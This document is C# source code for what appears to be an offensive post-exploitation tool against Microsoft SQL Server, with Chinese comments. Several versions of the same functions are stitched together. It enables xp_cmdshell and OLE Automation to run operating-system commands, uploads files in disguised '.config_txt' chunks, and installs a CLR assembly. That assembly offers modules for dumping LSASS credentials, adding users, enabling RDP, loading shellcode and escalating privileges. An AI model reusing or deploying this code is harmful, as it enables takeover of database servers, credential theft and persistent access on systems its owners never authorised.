static void Main(string[] args)
{
if (args.Length != 3)
{
Info.ShowUsage();
return;
}
var Conn = SqlConnet(args[0], args[1], args[2]);
var setting = new Setting(Conn);
var filesOptions = new FilesOptions(Conn, setting);
var execOptions = new ExecOptions(Conn, setting);
try
{
do
{
Console.Write("SQL> ");
string str = Console.ReadLine();
if (str.ToLower() == "exit")
{
Conn.Close(); break;
}
else if (str.ToLower() == "help")
{
Info.ShowModuleUsage(); continue;
}
string[] cmdline = str.Split(new char[] { ' ' }, 3);
String s = String.Empty;
for (int i = 1; i < cmdline.Length; i++)
{
s += cmdline[i] + " ";
}
switch (cmdline[0].ToLower())
{
case "enable_xp_cmdshell":
setting.Enable_xp_cmdshell();
break;
case "disable_xp_cmdshell":
setting.Disable_xp_cmdshell();
break;
case "xp_cmdshell":
execOptions.xp_cmdshell(s);
break;
case "enable_ole":
setting.Enable_ola();
break;
case "disable_ole":
setting.Disable_ole();
break;
case "sp_cmdshell":
execOptions.sp_cmdshell(s);
break;
case "upload":
filesOptions.UploadFiles(cmdline[1], cmdline[2]);
break;
case "download":
filesOptions.DownloadFiles(cmdline[2], cmdline[1]);
break;
default:
Console.WriteLine(Batch.RemoteExec(Conn, str, true));
break;
}
if (!ConnectionState.Open.Equals(Conn.State))
{
Console.WriteLine("[!] Disconnect....");
break;
}
}while (true);
}
catch (Exception ex)
{
Conn.Close();
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
}
}
static void Noninteractive(string[] args)
{
if (args.Length < 4)
{
Help();
return;
}
string target = args[0];
string username = args[1];
string password = args[2];
string module = args[3];
try
{
//sql建立连接
string connectionString = String.Format("Server = {0};Database = master;User ID = {1};Password = {2};", target, username, password);
Conn = new SqlConnection(connectionString);
Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
Conn.Open();
Console.WriteLine("[*] Database connection is successful!");
}
catch (Exception ex)
{
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
Environment.Exit(0);
}
setting = new Setting(Conn);
try
{
// string[] cmdline = str.Split(new char[] { ' ' }, 3);
switch (module.ToLower())
{
case "enable_xp_cmdshell":
setting.Enable_xp_cmdshell();
break;
case "disable_xp_cmdshell":
setting.Disable_xp_cmdshell();
break;
case "xp_cmdshell":
{
String command = String.Empty;
if (args.Length > 5)
{
for (int i = 4; i < args.Length; i++)
{
command += args[i] + " ";
}
}
else
{
command = args[4];
}
xp_shell(command);
break;
}
case "sp_oacreate":
{
{
String command = String.Empty;
if (args.Length > 5)
{
for (int i = 4; i < args.Length; i++)
{
command += args[i] + " ";
}
}
else
{
command = args[4];
}
sp_shell(command);
break;
}
}
case "upload":
UploadFiles(args[4], args[5]);
break;
case "download":
DownloadFiles(args[5], args[4]);
break;
case "enable_ole":
setting.Enable_ola();
break;
case "disable_ole":
setting.Disable_ole();
break;
case "clr_dumplsass":
clr_exec("clr_dumplsass");
break;
case "clr_rdp":
clr_exec("clr_rdp");
break;
case "clr_getav":
clr_exec("clr_getav");
break;
case "clr_adduser":
{
String s = String.Empty;
for (int i = 3; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_scloader":
{
String s = String.Empty;
for (int i = 3; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_scloader2":
{
String s = String.Empty;
for (int i = 3; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_download":
{
String s = String.Empty;
for (int i = 3; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "enable_clr":
setting.Enable_clr();
break;
case "disable_clr":
setting.Disable_clr();
break;
case "install_clr":
{
setting.Set_permission_set();
setting.CREATE_ASSEMBLY();
setting.CREATE_PROCEDURE();
Console.WriteLine("[+] Install crl successful!");
break;
}
case "uninstall_clr":
setting.drop_clr();
break;
default:
Console.WriteLine(Batch.RemoteExec(Conn, args[3], true));
break;
}
if (!ConnectionState.Open.Equals(Conn.State))
{
Console.WriteLine("[!] Disconnect....");
}
Conn.Close();
}
catch (Exception ex)
{
Conn.Close();
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
}
}
/// <summary>
/// xp_cmdshell 执行命令
/// </summary>
/// <param name="Command">命令</param>
static void xp_shell(String Command)
{
sqlstr = String.Format("exec master..xp_cmdshell '{0}'", Command);
Console.WriteLine(Batch.RemoteExec(Conn, sqlstr, true));
}
static void interactive(string[] args)
{
string target = args[0];
string username = args[1];
string password = args[2];
try
{
//sql建立连接
string connectionString = String.Format("Server = \"{0}\";Database = \"master\";User ID = \"{1}\";Password = \"{2}\";", target, username, password);
Conn = new SqlConnection(connectionString);
Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
Conn.Open();
Console.WriteLine("[*] Database connection is successful!");
}
catch (Exception ex)
{
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
Environment.Exit(0);
}
setting = new Setting(Conn);
try
{
do
{
Console.Write("SQL> ");
string str = Console.ReadLine();
if (str.ToLower() == "exit")
{
Conn.Close(); break;
}
else if (str.ToLower() == "help")
{
Help(); continue;
}
string[] cmdline = str.Split(new char[] { ' ' }, 3);
switch (cmdline[0].ToLower())
{
case "enable_xp_cmdshell":
setting.Enable_xp_cmdshell();
break;
case "disable_xp_cmdshell":
setting.Disable_xp_cmdshell();
break;
case "xp_cmdshell":
{
String s = String.Empty;
for (int i = 1; i < cmdline.Length; i++)
{
s += cmdline[i] + " ";
}
xp_shell(s);
break;
}
case "sp_oacreate":
{
String s = String.Empty;
for (int i = 1; i < cmdline.Length; i++)
{
s += cmdline[i] + " ";
}
sp_shell(s);
break;
}
case "upload":
UploadFiles(cmdline[1], cmdline[2]);
break;
case "download":
DownloadFiles(cmdline[2], cmdline[1]);
break;
case "enable_ole":
setting.Enable_ola();
break;
case "disable_ole":
setting.Disable_ole();
break;
case "clr_dumplsass":
clr_exec("clr_dumplsass");
break;
case "clr_rdp":
clr_exec("clr_rdp");
break;
case "clr_getav":
clr_exec("clr_getav");
break;
case "clr_adduser":
{
String s = String.Empty;
for (int i = 0; i < cmdline.Length; i++)
{
s += cmdline[i] + " ";
}
clr_exec(s);
break;
}
case "clr_scloader":
{
String s = String.Empty;
for (int i = 0; i < cmdline.Length; i++)
{
s += cmdline[i] + " ";
}
clr_exec(s);
break;
}
case "clr_scloader2":
{
String s = String.Empty;
for (int i = 0; i < cmdline.Length; i++)
{
s += cmdline[i] + " ";
}
clr_exec(s);
break;
}
case "clr_download":
{
String s = String.Empty;
for (int i = 0; i < cmdline.Length; i++)
{
s += cmdline[i] + " ";
}
clr_exec(s);
break;
}
case "enable_clr":
setting.Enable_clr();
break;
case "disable_clr":
setting.Disable_clr();
break;
case "install_clr":
{
setting.Set_permission_set();
setting.CREATE_ASSEMBLY();
setting.CREATE_PROCEDURE();
Console.WriteLine("[+] Install clr done.");
break;
}
case "uninstall_clr":
setting.drop_clr();
break;
default:
Console.WriteLine(Batch.RemoteExec(Conn, str, true));
break;
}
if (!ConnectionState.Open.Equals(Conn.State))
{
Console.WriteLine("[!] Disconnect....");
break;
}
}while (true);
}
catch (Exception ex)
{
Conn.Close();
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
}
}
/// <summary>
/// 文件上传,使用 OLE Automation Procedures 的 ADODB.Stream
/// </summary>
/// <param name="localFile">本地文件</param>
/// <param name="RemoteFile">远程文件</param>
static void UploadFiles(String localFile, String remoteFile)
{
Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile));
if (setting.Check_configuration("Ole Automation Procedures", 0))
{
if (setting.Enable_ola())
{
return;
}
}
int count = 0;
try
{
string hexString = string.Concat(File.ReadAllBytes(localFile).Select(b => b.ToString("X2")));
ArrayList arrlist = GetSeparateSubString(hexString, 150000);
foreach (string hex150000 in arrlist)
{
count++;
string filePath = String.Format("{0}_{1}.config_txt", remoteFile, count);
sqlstr = String.Format(@"
DECLARE @ObjectToken INT
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken, 'Type', 1
EXEC sp_OAMethod @ObjectToken, 'Open'
EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0}
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2
EXEC sp_OAMethod @ObjectToken, 'Close'
EXEC sp_OADestroy @ObjectToken", hex150000, filePath);
Batch.RemoteExec(Conn, sqlstr, false);
if (setting.File_Exists(filePath, 1))
{
Console.WriteLine("[+] {0}-{1} Upload completed", arrlist.Count, count);
}
else
{
Console.WriteLine("[!] {0}-{1} Error uploading", arrlist.Count, count);
Conn.Close();
Environment.Exit(0);
}
Thread.Sleep(5000);
}
string shell = String.Format(@"
DECLARE @SHELL INT
EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT
EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c ");
sqlstr = "copy /b ";
for (int i = 1; i < count + 1; i++)
{
if (i != count)
{
sqlstr += String.Format(@"{0}_{1}.config_txt+", remoteFile, i);
}
else
{
sqlstr += String.Format(@"{0}_{1}.config_txt {0}'", remoteFile, i);
}
}
Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile);
Batch.RemoteExec(Conn, shell + sqlstr, false);
Thread.Sleep(5000);
sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), ""));
Console.WriteLine("[+] {0}", sqlstr.Replace("'", ""));
Batch.RemoteExec(Conn, shell + sqlstr, false);
if (setting.File_Exists(remoteFile, 1))
{
Console.WriteLine("[*] '{0}' Upload completed", localFile);
}
}
catch (Exception ex)
{
Conn.Close();
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
}
}
/// <summary>
/// clr_exec 执行命令
/// </summary>
/// <param name="Command">命令</param>
static void clr_exec(String Command)
{
sqlstr = String.Format("exec dbo.ClrExec '{0}'", Command);
Batch.CLRExec(Conn, sqlstr);
}
static void Noninteractive(string[] args)
{
if (args.Length < 4)
{
Help();
return;
}
string target = args[0];
if (target.Contains(":"))
{
target = target.Replace(":", ",");
}
string username = args[1];
string password = args[2];
string database = args[3];
string module = args[4];
try
{
//sql建立连接
string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target, database, username, password);
Conn = new SqlConnection(connectionString);
Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
Conn.Open();
Console.WriteLine("[*] Database connection is successful!");
}
catch (Exception ex)
{
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
Environment.Exit(0);
}
setting = new Setting(Conn);
try
{
// string[] cmdline = str.Split(new char[] { ' ' }, 3);
switch (module.ToLower())
{
case "enable_xp_cmdshell":
setting.Enable_xp_cmdshell();
break;
case "disable_xp_cmdshell":
setting.Disable_xp_cmdshell();
break;
case "xp_cmdshell":
{
String command = String.Empty;
if (args.Length > 6)
{
for (int i = 5; i < args.Length; i++)
{
command += args[i] + " ";
}
}
else
{
command = args[5];
}
xp_shell(command);
break;
}
case "sp_oacreate":
{
{
String command = String.Empty;
if (args.Length > 6)
{
for (int i = 5; i < args.Length; i++)
{
command += args[i] + " ";
}
}
else
{
command = args[5];
}
sp_shell(command);
break;
}
}
case "upload":
UploadFiles(args[5], args[6]);
break;
case "download":
DownloadFiles(args[6], args[5]);
break;
case "enable_ole":
setting.Enable_ola();
break;
case "disable_ole":
setting.Disable_ole();
break;
case "clr_dumplsass":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_ping":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_cat":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_ls":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_cd":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_rm":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_pwd":
clr_exec("clr_pwd");
break;
case "clr_netstat":
clr_exec("clr_netstat");
break;
case "clr_ps":
clr_exec("clr_ps");
break;
case "clr_rdp":
clr_exec("clr_rdp");
break;
case "clr_getav":
clr_exec("clr_getav");
break;
case "clr_adduser":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_exec":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_efspotato":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_badpotato":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_scloader":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_scloader1":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_scloader2":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_download":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "clr_combine":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++)
{
s += args[i] + " ";
}
clr_exec(s);
break;
}
case "enable_clr":
setting.Enable_clr();
break;
case "disable_clr":
setting.Disable_clr();
break;
case "install_clr":
{
setting.install_clr();
break;
}
case "uninstall_clr":
setting.drop_clr();
break;
default:
Console.WriteLine(Batch.RemoteExec(Conn, args[3], true));
break;
}
if (!ConnectionState.Open.Equals(Conn.State))
{
Console.WriteLine("[!] Disconnect....");
}
Conn.Close();
}
catch (Exception ex)
{
Conn.Close();
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
}
}
/// <summary>
/// 文件上传,使用 OLE Automation Procedures 的 ADODB.Stream
/// </summary>
/// <param name="localFile">本地文件</param>
/// <param name="RemoteFile">远程文件</param>
static void UploadFiles(String localFile, String remoteFile)
{
Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile));
if (setting.Check_configuration("Ole Automation Procedures", 0) && !setting.Enable_ola())
{
return;
}
byte[] byteArray = ReadFileToByte(localFile);
string text = "copy /b ";
if (setting.File_Exists(remoteFile, 1))
{
Console.WriteLine("[+] {0} Exists", remoteFile);
return;
}
int num = 0;
int num2 = 0;
int splitLength = 250000;
List <int> list = SplitFileSize(byteArray.Length, splitLength);
try
{
foreach (int num3 in list)
{
string text2 = string.Format("{0}_{1}.config_txt", remoteFile, num);
byte[] array = new byte[num3];
Array.Copy(byteArray, num2, array, 0, num3);
string hexstr = string.Concat(from b in array
select b.ToString("X2"));
sqlstr = String.Format(@"
DECLARE @ObjectToken INT
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken, 'Type', 1
EXEC sp_OAMethod @ObjectToken, 'Open'
EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0}
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2
EXEC sp_OAMethod @ObjectToken, 'Close'
EXEC sp_OADestroy @ObjectToken", hexstr, text2);
Batch.RemoteExec(Conn, sqlstr, false);
num2 += num3;
num++;
text = text + "\"" + text2 + "\"+";
Thread.Sleep(1000);
if (setting.File_Exists(text2, 1))
{
Console.WriteLine("[+] {0}_{1}.config_txt Upload completed", remoteFile, num);
}
else
{
Console.WriteLine("[!] {0}_{1}.config_txt Error uploading", remoteFile, num);
Conn.Close();
Environment.Exit(0);
}
Thread.Sleep(1000);
}
text = text.Trim(new char[]
{
'+'
}) + " \"" + remoteFile + "\"'";
string shell = String.Format(@"
DECLARE @SHELL INT
EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT
EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c ");
Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile);
Batch.RemoteExec(Conn, shell + text, false);
Thread.Sleep(1000);
if (setting.File_Exists(remoteFile, 1))
{
sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), ""));
Console.WriteLine("[+] {0}", sqlstr.Replace("'", ""));
Batch.RemoteExec(Conn, shell + sqlstr, false);
Console.WriteLine("[*] '{0}' Upload completed", localFile);
}
//setting.Disable_ole();
}
catch (Exception ex)
{
Conn.Close();
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
}
}